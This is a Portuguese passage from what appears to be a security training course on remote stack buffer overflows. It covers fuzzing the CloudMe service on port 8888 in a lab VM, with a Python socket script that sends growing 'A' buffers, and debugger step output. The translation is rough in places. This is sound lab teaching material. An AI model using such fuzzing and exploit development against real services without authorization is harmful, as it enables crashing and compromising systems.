Remote Fuzzing

Até agora, concluímos um exercício de buffer overflow local, que cobriu todas as partes essenciais de um exercício de buffer overflow baseado em pilha. Quando se trata de exploração remota, a principal diferença estaria nos scripts de exploração, enquanto as partes principais da exploração de buffer overflow são as mesmas.

Debugging A Remote Program

Estejamos depurando um programa local ou um que escuta conexões remotas, teremos que instalá-lo e depurá-lo localmente em nossa VM do Windows. Assim que nosso exploit estiver totalmente desenvolvido, poderemos executá-lo no serviço remoto sem precisar de acesso local. Se feito corretamente, o exploit deverá funcionar, como veremos mais adiante.

Desta vez, estaremos depurando um programa chamado CloudMe, uma ferramenta de usuário final para um serviço de compartilhamento de arquivos, encontrada na área de trabalho da VM do Windows abaixo. Como um serviço de compartilhamento de arquivos, esta ferramenta escuta em uma porta quaisquer atualizações do servidor de arquivos. Podemos ver isso se a ferramenta estiver em execução e listamos as portas de escuta em Powershell

PS C:\htb> netstat -a

...SNIP...
TCP    0.0.0.0:8888           0.0.0.0:0              LISTENING
[CloudMe.exe]

Como podemos ver, o serviço está escutando na porta 8888e também estabeleceu uma conexão com um servidor remoto. Podemos usar o netcatprograma no Desktop para interagir com esta porta e ver se ela aceita algum parâmetro:

PS C:\Users\htb-student\Desktop> .\nc.exe 127.0.0.1 8888
?
PS C:\Users\htb-student\Desktop> .\nc.exe 127.0.0.1 8888
help

Fuzzing Remote Port

Assim que nosso programa estiver em execução e estivermos conectados a ele x32dbg, podemos começar a difusá-lo e tentar travá-lo. Ao contrário da difusão local, onde gravamos nossas cargas em um arquivo e depois abrimos o arquivo em nosso aplicativo ou copiamos manualmente nossa carga em um campo de texto no programa, com a difusão remota podemos automatizar esse processo por meio de nosso exploit Python.

Criaremos um novo script chamado win32bof_exploit_remote.pye começaremos adicionando algumas variáveis ​​para IPe port, para que possamos alterá-las facilmente se quisermos usar o script em outro servidor. Então, escreveremos nossa função fuzzing def fuzz():. Queremos enviar incrementos de strings grandes, começando com 500bytes e incrementando a 500cada iteração, até enviarmos uma string longa o suficiente que trave o programa. Para fazer isso, faremos um loop em um intervalo de 0até 10,000com incrementos de 500, como segue:

win32bof_exploit_remote.py

import socket
from struct import pack

IP = "127.0.0.1"
port = 8888

def fuzz():
    try:
        for i in range(0,10000,500):
            buffer = b"A"*i
            print("Fuzzing %s bytes" % i)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((IP, port))
            s.send(buffer)
            s.close()
    except:
        print("Could not establish a connection")

fuzz()

Gradual Fuzzing

Enfrentamos o problema aqui porque nosso programa nunca para de enviar cargas, já que o serviço de escuta nunca falha. Então, como poderíamos saber em que tamanho do buffer o programa travou?

Podemos enviar gradualmente nosso buffer adicionando um breakpoint()after s.send(buffer), de modo que, quando pudermos continuar manualmente pressionando c, possamos ver se nossa entrada travou o programa e sobrescreveu EIP.

Dica: você pode ter ambos x32dbge o python IDLE lado a lado, para poder perceber imediatamente quando o programa travar.

Então, adicionaremos nosso ponto de interrupção ao nosso exploit, reiniciaremos o programa x32dbge começaremos gradualmente a confundir o programa:

Fuzzing 0 bytes
> c:\users\htb-student\desktop\win32bof_exploit_remote.py(13)fuzz()
-> s.send(buffer)
(Pdb) c
Fuzzing 500 bytes
> c:\users\htb-student\desktop\win32bof_exploit_remote.py(12)fuzz()
-> breakpoint()
(Pdb) c
Fuzzing 1000 bytes
> c:\users\htb-student\desktop\win32bof_exploit_remote.py(13)fuzz()
-> s.send(buffer)
(Pdb) c
Fuzzing 1500 bytes
> c:\users\htb-student\desktop\win32bof_exploit_remote.py(12)fuzz()
-> breakpoint()
(Pdb) c
...

Depois que o programa trava e EIPé sobrescrito, sabemos que a última quantidade de bytes que enviamos foi o que travou o programa e que o programa está vulnerável a um buffer overflow.